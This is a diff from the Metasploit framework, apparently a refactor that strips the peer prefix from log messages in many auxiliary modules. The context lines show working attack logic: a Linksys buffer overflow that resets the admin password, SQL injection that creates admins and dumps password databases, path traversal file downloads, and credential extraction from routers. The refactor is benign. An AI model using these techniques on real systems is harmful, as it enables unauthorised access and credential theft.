creation failed") return end - print_good("#{peer} - Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") + print_good("Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index e3acc7bf4b..f5b371da2b 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb @@ -34,20 +34,20 @@ class Metasploit3 < Msf::Auxiliary end def check_login(user) - print_status("#{peer} - Trying to login with #{user} and empty password") + print_status("Trying to login with #{user} and empty password") res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,"") }) if res.nil? || res.code == 404 - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false elsif [200, 301, 302].include?(res.code) - print_good("#{peer} - Successful login #{user} and empty password") + print_good("Successful login #{user} and empty password") return true else - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false end end @@ -56,15 +56,15 @@ class Metasploit3 < Msf::Auxiliary begin if check_login("admin") - print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.") + print_good("login with user admin and no password possible. There is no need to use this module.") return end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end - print_status("#{peer} - Resetting password for the admin user ...") + print_status("Resetting password for the admin user ...") postdata = Rex::Text.rand_text_alpha(246) # Filler postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory @@ -94,15 +94,15 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 if check_login("admin") - print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password") + print_good("Expected answer and the login was successful. Try to login with the user admin and a blank password") else - print_status("#{peer} - Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") + print_status("Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") end else - print_error("#{peer} - Unexpected answer. Exploit attempt has failed") + print_error("Unexpected answer. Exploit attempt has failed") end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end end diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 06f5ffceca..871d6c8830 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary # Yes, "sucess" is really mispelt, as is "Servelet" ... ! unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/ - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end - print_good("#{peer} - Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + print_good("Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index cf33a28787..9d782c370c 100644 --- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -182,14 +182,14 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 else cookie = get_cookie end if cookie.nil? - print_error("#{peer} - Failed to get application cookies!") + print_error("Failed to get application cookies!") return end @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Listing directory #{datastore['DIRECTORY']}") + print_status("Listing directory #{datastore['DIRECTORY']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File with directory listing saved in: #{path}") else - print_error("#{peer} - Failed to list directory.") + print_error("Failed to list directory.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index 49331f2752..fe04617a13 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 if cookie.nil? - print_error("#{peer} - Failed to login to IT360!") + print_error("Failed to login to IT360!") return end else @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or is empty.") + print_error("0 bytes returned, file does not exist or is empty.") return end @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5fa29d0f9c..0dc6890946 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary def run unless check == Exploit::CheckCode::Appears - print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...") + print_error("Fingerprint hasn't been successful, trying to exploit anyway...") end version = get_version @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary creds = inject_sql(version < 7000 ? true : false) username = creds[0] password = creds[1] - print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") + print_good("Created a new Super Administrator with username: #{username} | password: #{password}") cookie_su = login(username, password) @@ -241,10 +241,10 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end - print_status("#{peer} - Reporting Super Administrator credentials...") + print_status("Reporting Super Administrator credentials...") report_super_admin_creds(username, password) - print_status("#{peer} - Leaking Password database...") + print_status("Leaking Password database...") loot_passwords(cookie_su) end @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s.length > 0 vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + print_good("Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' loot_type = 'text/csv' loot_filename = 'manageengine_pmp_password_db.csv' @@ -320,9 +320,9 @@ class Metasploit3 < Msf::Auxiliary res.body, loot_filename, loot_desc) - print_status("#{peer} - Password database saved in: #{p}") + print_status("Password database saved in: #{p}") else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") + print_error("Failed to export Password Manager Pro passwords.") end end end diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 23df8b7b73..d42ee31992 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Copying file to Web location...") + print_status("Copying file to Web location...") dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/" res = send_request_cgi( @@ -86,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} copied to #{dst_path} successfully") + print_good("File #{file} copied to #{dst_path} successfully") else - print_error("#{peer} - Failed to copy #{file} to #{dst_path}") + print_error("Failed to copy #{file} to #{dst_path}") end - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -101,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end # Cleanup @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 8e147f4927..5b920ae2c0 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb @@ -46,21 +46,21 @@ class Metasploit3 < Msf::Auxiliary def run # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'), 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }, }) rescue Rex::ConnectionError - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end # Show data if needed if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.") + print_error("0 bytes returned, file does not exist or it is empty.") return end vprint_line(res.body.to_s) @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index 9158af9b7e..f7e8ee50c1 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb +++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb @@ -44,16 +44,16 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to access the configuration of the device") + print_status("Trying to access the configuration of the device") # extract device details action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo' - print_status("#{peer} - Extracting Firmware version...") + print_status("Extracting Firmware version...") extract_data(action) # extract credentials action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo' - print_status("#{peer} - Extracting credentials...") + print_status("Extracting credentials...") extract_data(action) end @@ -75,26 +75,26 @@ class Metasploit3 < Msf::Auxiliary return if res.headers['Server'] !~ /Linux\/2.6.15 uhttpd\/1.0.0 soap\/1.0/ if res.body =~ /<NewPassword>(.*)<\/NewPassword>/ - print_status("#{peer} - Credentials found, extracting...") + print_status("Credentials found, extracting...") extract_credentials(res.body) end if res.body =~ /<ModelName>(.*)<\/ModelName>/ model_name = $1 - print_good("#{peer} - Model #{model_name} found") + print_good("Model #{model_name} found") end if res.body =~ /<Firmwareversion>(.*)<\/Firmwareversion>/ firmware_version = $1 - print_good("#{peer} - Firmware version #{firmware_version} found") + print_good("Firmware version #{firmware_version} found") #store all details as loot loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body) - print_good("#{peer} - Device details downloaded to: #{loot}") + print_good("Device details downloaded to: #{loot}") end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary body.each_line do |line| if line =~ /<NewPassword>(.*)<\/NewPassword>/ pass = $1 - print_good("#{peer} - admin / #{pass} credentials found") + print_good("admin / #{pass} credentials found") service_data = { address: rhost, @@ -137,6 +137,6 @@ class Metasploit3 < Msf::Auxiliary # store all details as loot loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body) - print_good("#{peer} - Account details downloaded to: #{loot}") + print_good("Account details downloaded to: #{loot}") end end diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 8a7c25a70e..6a12988779 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Trying to delete #{datastore['RPATH']}...") + print_status("Trying to delete #{datastore['RPATH']}...") res = send_request_cgi( { @@ -57,9 +57,9 @@ class Metasploit3 < Msf::Auxiliary }, 5) if res and res.code == 200 and res.body =~ /<RESULT><VERSION>1<\/VERSION><STATUS>0<\/STATUS><TRANSID>0<\/TRANSID><\/RESULT>/ - print_good("#{peer} - File #{datastore['RPATH']} successfully deleted") + print_good("File #{datastore['RPATH']} successfully deleted") else - print_error("#{peer} - File not deleted") + print_error("File not deleted") end end diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index d95a6c2802..ee19d364b1 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << file travs << "%00" - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") + print_status("Checking if it's a Sophos Web Protect Appliance with the vulnerable component...") if is_proficy? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found") + print_error("Sophos Web Protect Appliance vulnerable component not found") return end contents = read_file(datastore['FILEPATH']) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index be790a49dd..ed9226caa4 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary }) if res && res.code == 200 && res.body.to_s =~ /Error while creating account/ # No way to know whether this worked or not, it always says error - print_status("#{peer} - The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") + print_status("The new administrator #{datastore['USERNAME']}:#{datastore['PASSWORD']} should be checked manually") service_data = { address: rhost, port: rport, @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary login_data.merge!(service_data) create_credential_login(login_data) else - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end end end diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index e11ccfc8ae..f010b3f631 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end def get_traversal_path - print_status("#{peer} - Trying to find out the traversal path...") + print_status("Trying to find out the traversal path...") large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary }, }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::BadConfig, 'Please supply the path of the file you want to download.') end - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") if datastore['FILEPATH'] =~ /([A-Za-z]{1}):(\\*)(.*)/ file_path = $3 else @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary traversal_path = get_traversal_path if traversal_path.nil? - print_error("#{peer} - Could not get traversal path, using bruteforce to download the file") + print_error("Could not get traversal path, using bruteforce to download the file") count = 1 while count < 15 res = download_file(('../' * count) + file_path) diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 7a219171e5..308d928a81 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::Unknown, 'Could not resolve database server hostname.') end - print_status("#{peer} - Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") + print_status("Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") return end else diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index b9efc4ae7f..bba990712d 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -79,11 +79,11 @@ class Metasploit3 < Msf::Auxiliary def run if user == pass - print_error("#{peer} - Please select a password different than the username") + print_error("Please select a password different than the username") return end - print_status("#{peer} - Trying a new admin vBulletin account...") + print_status("Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /Administrator account created/ - print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") + print_good("Admin account with credentials #{user}:#{pass} successfully created") report_cred( ip: rhost, port: rport, @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Auxiliary proof: res.body ) else - print_error("#{peer} - Admin account creation failed") + print_error("Admin account creation failed") end end end diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index b86b2ee014..21cb5b66ce 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Auxiliary username = Rex::Text.rand_text_alpha(10) password = Rex::Text.rand_text_alpha(20) - print_status("#{peer} - Trying to get table_prefix") + print_status("Trying to get table_prefix") table_prefix = get_table_prefix if table_prefix.nil? - print_error("#{peer} - Unable to get table_prefix") + print_error("Unable to get table_prefix") return else - print_status("#{peer} - got table_prefix '#{table_prefix}'") + print_status("got table_prefix '#{table_prefix}'") end data = Rex::MIME::Message.new @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"') post_data = data.to_s - print_status("#{peer} - Inserting user #{username} with password #{password}") + print_status("Inserting user #{username} with password #{password}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary # login successfull if cookie - print_status("#{peer} - User #{username} with password #{password} successfully created") + print_status("User #{username} with password #{password} successfully created") report_cred( ip: rhost, port: rport, @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary proof: cookie ) else - print_error("#{peer} - User creation failed") + print_error("User creation failed") return end end diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 2a8c26fba6..4051e0baa5 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -65,44 +65,44 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") elsif res.code != 200 - vprint_warning("#{peer} - Server responded with status code #{res.code}") + vprint_warning("Server responded with status code #{res.code}") end res end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) if cookie.nil? - print_error("#{peer} - Failed to authenticate with WordPress") + print_error("Failed to authenticate with WordPress") return end - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? - print_error("#{peer} - Failed to change the admin e-mail address") + print_error("Failed to change the admin e-mail address") return end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? - print_error("#{peer} - Failed to enable user registrations") + print_error("Failed to enable user registrations") return end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? - print_error("#{peer} - Failed to set the default user role") + print_error("Failed to set the default user role") return end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 2fada64417..25c01c9f28 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary def set_wp_option(name, value, cookie) encoded_value = serialize_and_encode(value) if encoded_value.nil? - vprint_error("#{peer} - Failed to serialize #{value}.") + vprint_error("Failed to serialize #{value}.") else res = send_request_cgi( 'method' => 'POST', @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") else - vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_warning("Server responded with status code #{res.code}") if res.code != 200 end return res @@ -97,29 +97,29 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address') end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations') end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to set the default user role') end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 0ef51aa38a..170a40091e 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to connect and check endianess...") + print_status("Attempting to connect and check endianess...") @endianess = fingerprint_endian @credentials = {} @@ -72,18 +72,18 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to check endianess, aborting...") return end - print_good("#{peer} - #{string_endianess} device found...") + print_good("#{string_endianess} device found...") - print_status("#{peer} - Attempting to connect and dump configuration...") + print_status("Attempting to connect and dump configuration...") config = dump_configuration if config.nil? - print_status("#{peer} - Error retrieving configuration, aborting...") + print_status("Error retrieving configuration, aborting...") return end loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations") - print_status("#{peer} - Router configuration dump stored in: #{loot_file}") + print_status("Router configuration dump stored in: #{loot_file}") parse_configuration(config[:data]) end @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary disconnect if res.blank? - vprint_error("#{peer} - No answer...") + vprint_error("No answer...") return end @@ -186,17 +186,17 @@ class Metasploit3 < Msf::Auxiliary end unless mark == 0x4d4d6353 - vprint_error("#{peer} - Incorrect mark when reading response") + vprint_error("Incorrect mark when reading response") return nil end unless zero == 0 - vprint_error("#{peer} - Incorrect zero when reading response") + vprint_error("Incorrect zero when reading response") return nil end unless length == data.length - vprint_warning("#{peer} - Inconsistent length / data packet") + vprint_warning("Inconsistent length / data packet") # return nil end @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary @credentials.each do |k,v| next unless v[:user] and v[:password] - print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}") + print_status("#{k}: User: #{v[:user]} Pass: #{v[:password]}") report_cred( ip: rhost, port: rport, @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary SETTINGS['General'].each do |regex| if config.match(regex[1]) value = $1 - print_status("#{peer} - #{regex[0]}: #{value}") + print_status("#{regex[0]}: #{value}") end end end diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index 83a8d2d1ec..dc6b36654f 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -39,49 +39,49 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Grabbing the SQL Server name and domain...") + print_status("Grabbing the SQL Server name and domain...") db_server_name = get_server_name if db_server_name.nil? - print_error("#{peer} - Unable to grab the server name") + print_error("Unable to grab the server name") return else - print_good("#{peer} - Server name: #{db_server_name}") + print_good("Server name: #{db_server_name}") end db_domain_name = get_domain_name if db_domain_name.nil? - print_error("#{peer} - Unable to grab domain name") + print_error("Unable to grab domain name") return end # Check if server is on a domain if db_server_name == db_domain_name - print_error("#{peer} - The SQL Server does not appear to be part of a Windows domain") + print_error("The SQL Server does not appear to be part of a Windows domain") return else - print_good("#{peer} - Domain name: #{db_domain_name}") + print_good("Domain name: #{db_domain_name}") end - print_status("#{peer} - Grabbing the SID for the domain...") + print_status("Grabbing the SID for the domain...") windows_domain_sid = get_windows_domain_sid(db_domain_name) if 